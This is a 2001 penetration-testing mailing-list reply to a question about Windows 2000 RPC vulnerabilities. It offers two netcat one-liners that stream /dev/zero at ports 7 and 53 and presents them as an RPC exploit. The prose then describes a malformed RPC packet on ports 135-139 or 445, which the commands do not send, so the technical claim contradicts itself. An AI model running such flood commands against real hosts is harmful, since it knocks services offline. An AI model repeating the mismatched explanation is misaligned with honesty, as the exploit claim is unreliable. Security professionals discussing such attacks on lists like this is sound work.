Re: [PEN-TEST] RPC enumeration

From: Felix Huber (huberfelixat_private)
Date: Sun Apr 29 2001 - 03:46:53 PDT


    > Hi list!
    > ....
    > finally...
    >
    >          3. Are there any RPC vulnerabilities out there? (besides denial of service)
    >
    >
    > TIA!
    >
    > Steve
    
    Hi Steve,
    
    Sorry for the late reply - just saw this thread.
    
    Here is a possible exploit for the RPC Win2K port:
    
    "nc target.host 7 < /dev/zero" for TCP or
    "nc -u target.host 53 < /dev/zero" for UDP
    
    Sending a specially malformed RPC packet via port 135-139 or 445 to a
    Windows 2000 server will halt the RPC service entirely.
    A reboot is required in order to regain normal functionality.
    
    
    Regards,
    Felix Huber
    
    
    -------------------------------------------------------
    Felix Huber, Web Application Programmer, Webtopia
    Guendlinger Str.2, 79241 Ihringen - Germany
    huberfelixat_private     (07668)  951 156 (phone)
    http://www.webtopia.de     (07668)  951 157 (fax)
                                             (01792)  205 724 (mobile)
    -------------------------------------------------------
    


